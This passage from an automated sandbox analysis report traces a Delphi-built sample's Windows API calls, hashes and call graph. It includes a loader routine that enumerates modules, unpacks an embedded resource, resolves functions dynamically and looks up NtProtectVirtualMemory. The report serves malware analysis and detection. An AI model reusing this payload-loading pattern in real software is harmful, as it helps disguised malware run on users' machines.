                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?,029E37C8,?,?,029AB7A8,02986575,029AA305), ref: 0298435F
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,029843A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?,029E37C8), ref: 02984374
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,029843A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?), ref: 0298437A
                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02984398
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                            • Opcode ID: a4d8d0a76e6ee3bb9e75cdaa707408f724745eb8b36f17df7b3d64c32635965d
                                                                                                                            • Instruction ID: 4179376cd81e9cac38bf43843ecdd32b07f9a698cb0216a7e8a0ec081a18fee7
                                                                                                                            • Opcode Fuzzy Hash: a4d8d0a76e6ee3bb9e75cdaa707408f724745eb8b36f17df7b3d64c32635965d
                                                                                                                            • Instruction Fuzzy Hash: CDF09070AC8345B9FF10B2A0AD56F79274C5BD5F29F580B06B229E90C587F044C18B66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0298ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298AD15
  • Part of subcall function 0298ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD39
  • Part of subcall function 0298ACF8: GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD54
  • Part of subcall function 0298ACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADEA
• CharToOemA.USER32(?,?), ref: 0298AEB7
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0298AED4
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEDA
• GetStdHandle.KERNEL32(000000F4,0298AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEEF
• WriteFile.KERNEL32(00000000,000000F4,0298AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEF5
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0298AF17
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 0298AF2D
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E5E1
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E5FD
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0298E636
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E6B3
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0298E6CC
• VariantCopy.OLEAUT32(?,00000000), ref: 0298E701
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0298357E
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835B1
• RegCloseKey.ADVAPI32(?,029835D4,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835C7
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,0298AAA3,?,?,00000000), ref: 0298AA24
  • Part of subcall function 0298A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,0298AAA3,?,?,00000000), ref: 0298AA54
• EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 0298AA5F
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,0298AAA3,?,?,00000000), ref: 0298AA7D
• EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 0298AA88
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread$CalendarEnum
• String ID:
• API String ID: 4102113445-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0298352C: GetKeyboardType.USER32(00000000), ref: 02983531
  • Part of subcall function 0298352C: GetKeyboardType.USER32(00000001), ref: 0298353D
• GetCommandLineA.KERNEL32 ref: 029AA06C
• GetACP.KERNEL32 ref: 029AA080
• GetCurrentThreadId.KERNEL32 ref: 029AA08A
  • Part of subcall function 0298355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0298357E
  • Part of subcall function 0298355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835B1
  • Part of subcall function 0298355C: RegCloseKey.ADVAPI32(?,029835D4,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835C7
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
• String ID: @8x
• API String ID: 3316616684-3331985703
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,0298AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0298AAEB
  • Part of subcall function 0298A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02997A09
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997A0F
Strings
• NtProtectVirtualMemory, xrefs: 029979FF
• C:\Windows\System32\ntdll.dll, xrefs: 02997A04
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
• API String ID: 1646373207-1386159242
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,029AA10B,00000000,029AA11E), ref: 0298C436
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0298C447
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
                                                                                                                            • Opcode ID: 6b2586d94c7fa4fe4abaf026c07a2ddbb0c97d73992a0875e72cbfd593a5a494
                                                                                                                            • Instruction ID: 7252cf8f42e9c52b465cccb4a335f681fd0faaa562f5df947f791a70378b47ea
                                                                                                                            • Opcode Fuzzy Hash: 6b2586d94c7fa4fe4abaf026c07a2ddbb0c97d73992a0875e72cbfd593a5a494
                                                                                                                            • Instruction Fuzzy Hash: 2AD0A770A843454EFB04BABD5494B3923DC8B94709F0C882AF0265D140D77184908FF0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E253
                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E26F
                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E2E6
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0298E30F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 920484758-0
                                                                                                                            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                            • Instruction ID: 7cb8c1bab498950ba30a9cb853d1d1ccc0680e9c148af2a1900940e3ce7845a8
                                                                                                                            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                            • Instruction Fuzzy Hash: 9241F975A002199FCB62FB68C890BD9B3BDAF89314F0841E5F548E7251DB34AF808F61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298AD15
                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD39
                                                                                                                            • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD54
                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADEA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3990497365-0
                                                                                                                            • Opcode ID: c24d9622cebe5f07288467227882df49958cc68a3f814ce946b390ea1128fbc1
                                                                                                                            • Instruction ID: c84996ce1ee7d7e78fe0793e27d31de4a77d6bd6b9fcbf77851d4fdd5c94b41b
                                                                                                                            • Opcode Fuzzy Hash: c24d9622cebe5f07288467227882df49958cc68a3f814ce946b390ea1128fbc1
                                                                                                                            • Instruction Fuzzy Hash: 4F41FA71A002589BDB21EB68CC84BDEB7FDAF48701F4844E6A548EB251EB759F848F50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298AD15
                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD39
                                                                                                                            • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD54
                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADEA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3990497365-0
                                                                                                                            • Opcode ID: bba60a97461b6a824b69038c9399fa204d4f0105e64c2acc1038d799dbebe756
                                                                                                                            • Instruction ID: 18d32ef98542ac811705d88557a9a7244fe4336d028e7e7a5b69ed9e13009f2a
                                                                                                                            • Opcode Fuzzy Hash: bba60a97461b6a824b69038c9399fa204d4f0105e64c2acc1038d799dbebe756
                                                                                                                            • Instruction Fuzzy Hash: 41411F71A0025C9BDB21EB68CC84BDAB7FDAF48701F4844E6A548EB251EB759F84CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 75a37c3d936d4cc9ea925468cace744a87d35da855c294c74fd00965e3be0dc7
                                                                                                                            • Instruction ID: 5ca2e26d35e60fe40e9b5cb9cb61035a34a25a8ca6229840574b5b0cd12fa790
                                                                                                                            • Opcode Fuzzy Hash: 75a37c3d936d4cc9ea925468cace744a87d35da855c294c74fd00965e3be0dc7
                                                                                                                            • Instruction Fuzzy Hash: 6DA1B0A77106014BD718BA7C9D843BDB3CADBC4225F2C867EE21DCB391EB68C9538650
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02989596), ref: 0298952E
                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02989596), ref: 02989534
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                            • String ID: yyyy
                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                            • Opcode ID: 9bcb950bfdf450153fa18ef808eac29a47b1bb07a6eb53d769c0c30216686903
                                                                                                                            • Instruction ID: 95c150e57f500644e7d42599372e32b2d030ebc15fb6e9adf9b54de33689d056
                                                                                                                            • Opcode Fuzzy Hash: 9bcb950bfdf450153fa18ef808eac29a47b1bb07a6eb53d769c0c30216686903
                                                                                                                            • Instruction Fuzzy Hash: 2B213071A012189BEB15EF68D841AFEB3F9EF88710F5900A5ED05E7740E7309E40CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02999FD0
                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0299A000
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 0299A01F
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0299A02B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Read$Write
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3448952669-0
                                                                                                                            • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                            • Instruction ID: 8769c20d94a9e8501af8c16b303290da4522c3efd6e0b84545f1176eb64f68f4
                                                                                                                            • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                            • Instruction Fuzzy Hash: 9B2196716402199BDF10DF6DCC80BAEB7ADFF8A365F048515EE149B340E734ED518AA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage: 8.2%
                                                                                                                            Dynamic/Decrypted Code Coverage: 64.6%
                                                                                                                            Signature Coverage: 8.7%
                                                                                                                            Total number of Nodes: 492
                                                                                                                            Total number of Limit Nodes: 61
__RTC_Initialize 59437->59439 59536 40cbb4 62 API calls 3 library calls 59438->59536 59476 411a15 67 API calls 2 library calls 59439->59476 59441 40cc57 59441->59439 59443 40cc66 59444 40cc72 GetCommandLineA 59443->59444 59445 40cc6a 59443->59445 59477 412892 71 API calls 3 library calls 59444->59477 59537 40e79a 62 API calls 3 library calls 59445->59537 59448 40cc71 59448->59444 59449 40cc82 59538 4127d7 107 API calls 3 library calls 59449->59538 59451 40cc8c 59452 40cc90 59451->59452 59453 40cc98 59451->59453 59539 40e79a 62 API calls 3 library calls 59452->59539 59478 41255f 106 API calls 6 library calls 59453->59478 59456 40cc97 59456->59453 59457 40cc9d 59458 40cca1 59457->59458 59459 40cca9 59457->59459 59540 40e79a 62 API calls 3 library calls 59458->59540 59479 40e859 73 API calls 5 library calls 59459->59479 59462 40cca8 59462->59459 59463 40ccb0 59464 40ccb5 59463->59464 59465 40ccbc 59463->59465 59541 40e79a 62 API calls 3 library calls 59464->59541 59480 4019f0 OleInitialize 59465->59480 59468 40ccd8 59470 40ccea 59468->59470 59542 40ea0a 62 API calls _doexit 59468->59542 59469 40ccbb 59469->59465 59543 40ea36 62 API calls _doexit 59470->59543 59473 40ccef __alloc_osfhnd 59475 40cc3a 59474->59475 59475->59434 59534 40cbb4 62 API calls 3 library calls 59475->59534 59476->59443 59477->59449 59478->59457 59479->59463 59481 401ab9 59480->59481 59544 40b99e 59481->59544 59483 401abf 59484 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 59483->59484 59514 402467 59483->59514 59485 401dc3 FindCloseChangeNotification GetModuleHandleA 59484->59485 59493 401c55 59484->59493 59557 401650 59485->59557 59487 401e8b FindResourceA LoadResource LockResource SizeofResource 59559 40b84d 59487->59559 59491 401c9c CloseHandle 59491->59468 59492 401ecb _memset 59494 401efc SizeofResource 59492->59494 59493->59491 59497 401cf9 Module32Next 59493->59497 59495 401f1c 59494->59495 59496 401f5f 59494->59496 59495->59496 59615 401560 __VEC_memcpy __cftoe2_l 
59495->59615 59499 401f92 _memset 59496->59499 59616 401560 __VEC_memcpy __cftoe2_l 59496->59616 59497->59485 59506 401d0f 59497->59506 59501 401fa2 FreeResource 59499->59501 59502 40b84d _malloc 62 API calls 59501->59502 59503 401fbb SizeofResource 59502->59503 59504 401fe5 _memset 59503->59504 59505 4020aa LoadLibraryA 59504->59505 59507 401650 59505->59507 59506->59491 59509 401dad Module32Next 59506->59509 59508 40216c GetProcAddress 59507->59508 59510 4021aa 59508->59510 59508->59514 59509->59485 59509->59506 59510->59514 59589 4018f0 59510->59589 59512 40243f 59512->59514 59617 40b6b5 62 API calls 2 library calls 59512->59617 59514->59468 59515 4021f1 59515->59512 59601 401870 59515->59601 59517 402269 VariantInit 59518 401870 75 API calls 59517->59518 59519 40228b VariantInit 59518->59519 59520 4022a7 59519->59520 59521 4022d9 SafeArrayCreate SafeArrayAccessData 59520->59521 59606 40b350 59521->59606 59524 40232c 59525 402354 SafeArrayDestroy 59524->59525 59533 40235b 59524->59533 59525->59533 59526 402392 SafeArrayCreateVector 59527 4023a4 59526->59527 59528 4023bc VariantClear VariantClear 59527->59528 59608 4019a0 59528->59608 59531 40242e 59532 4019a0 65 API calls 59531->59532 59532->59512 59533->59526 59534->59434 59535->59437 59536->59441 59537->59448 59538->59451 59539->59456 59540->59462 59541->59469 59542->59470 59543->59473 59547 40b9aa __alloc_osfhnd _strnlen 59544->59547 59545 40b9b8 59618 40bfc1 62 API calls __getptd_noexit 59545->59618 59547->59545 59550 40b9ec 59547->59550 59548 40b9bd 59619 40e744 6 API calls 2 library calls 59548->59619 59620 40d6e0 62 API calls 2 library calls 59550->59620 59552 40b9f3 59621 40b917 120 API calls 3 library calls 59552->59621 59554 40b9ff 59622 40ba18 LeaveCriticalSection _doexit 59554->59622 59555 40b9cd __alloc_osfhnd 59555->59483 59558 4017cc _memcpy_s 59557->59558 59558->59487 59560 40b900 59559->59560 59569 40b85f 59559->59569 59630 40d2e3 6 API calls __decode_pointer 59560->59630 59562 40b906 59631 
40bfc1 62 API calls __getptd_noexit 59562->59631 59567 40b8bc RtlAllocateHeap 59567->59569 59569->59567 59570 40b870 59569->59570 59571 40b8ec 59569->59571 59574 40b8f1 59569->59574 59576 401ebf 59569->59576 59626 40b7fe 62 API calls 4 library calls 59569->59626 59627 40d2e3 6 API calls __decode_pointer 59569->59627 59570->59569 59623 40ec4d 62 API calls 2 library calls 59570->59623 59624 40eaa2 62 API calls 7 library calls 59570->59624 59625 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 59570->59625 59628 40bfc1 62 API calls __getptd_noexit 59571->59628 59629 40bfc1 62 API calls __getptd_noexit 59574->59629 59577 40af66 59576->59577 59579 40af70 59577->59579 59578 40b84d _malloc 62 API calls 59578->59579 59579->59578 59580 40af8a 59579->59580 59584 40af8c std::bad_alloc::bad_alloc 59579->59584 59632 40d2e3 6 API calls __decode_pointer 59579->59632 59580->59492 59582 40afb2 59634 40af49 62 API calls std::exception::exception 59582->59634 59584->59582 59633 40d2bd 73 API calls __cinit 59584->59633 59585 40afbc 59635 40cd39 RaiseException 59585->59635 59588 40afca 59590 401903 lstrlenA 59589->59590 59591 4018fc 59589->59591 59636 4017e0 59590->59636 59591->59515 59594 401940 GetLastError 59596 40194b MultiByteToWideChar 59594->59596 59597 40198d 59594->59597 59595 401996 59595->59515 59598 4017e0 77 API calls 59596->59598 59597->59595 59652 401030 GetLastError EntryPoint 59597->59652 59599 401970 MultiByteToWideChar 59598->59599 59599->59597 59602 40af66 74 API calls 59601->59602 59603 40187c 59602->59603 59604 401885 SysAllocString 59603->59604 59605 4018a4 59603->59605 59604->59605 59605->59517 59607 40231a SafeArrayUnaccessData 59606->59607 59607->59524 59609 4019aa InterlockedDecrement 59608->59609 59610 4019df VariantClear 59608->59610 59609->59610 59611 4019b8 59609->59611 59610->59531 59611->59610 59612 4019c2 SysFreeString 59611->59612 59613 4019c9 59611->59613 59612->59613 59656 40aec0 63 API calls 2 library calls 59613->59656 
59615->59495 59616->59499 59617->59514 59618->59548 59620->59552 59621->59554 59622->59555 59623->59570 59624->59570 59626->59569 59627->59569 59628->59574 59629->59576 59630->59562 59631->59576 59632->59579 59633->59582 59634->59585 59635->59588 59637 4017f3 59636->59637 59638 4017e9 EntryPoint 59636->59638 59639 401805 59637->59639 59640 4017fb EntryPoint 59637->59640 59638->59637 59641 401818 59639->59641 59642 40180e EntryPoint 59639->59642 59640->59639 59643 401844 59641->59643 59644 40183e 59641->59644 59653 40b783 72 API calls 4 library calls 59641->59653 59642->59641 59648 40186d MultiByteToWideChar 59643->59648 59649 40184e EntryPoint 59643->59649 59655 40b743 62 API calls 2 library calls 59643->59655 59654 40b6b5 62 API calls 2 library calls 59644->59654 59648->59594 59648->59595 59649->59643 59650 40182d 59650->59643 59651 401834 EntryPoint 59650->59651 59651->59644 59653->59650 59654->59643 59655->59643 59656->59610

                                                                                                                            Control-flow Graph

[Control-flow graph of the function at 0x4019f0 (basic blocks 0x4019f0 to 0x402496), rendered in the original as a coloured block-edge list that distinguishes executed from not-executed blocks; it is not reproducible here. Recoverable path through the function: OleInitialize; GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First and a Module32Next loop over the loaded modules; FindCloseChangeNotification and GetModuleHandleA; FindResourceA, LoadResource, LockResource, SizeofResource, _malloc, _memset, a second SizeofResource and FreeResource; LoadLibraryA and GetProcAddress; then VariantInit, SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector and VariantClear around two indirect calls into 0x3becd005 and 0x3becd01d.]
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                            • _getenv.LIBCMT ref: 00401ABA
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                            • Module32First.KERNEL32 ref: 00401C48
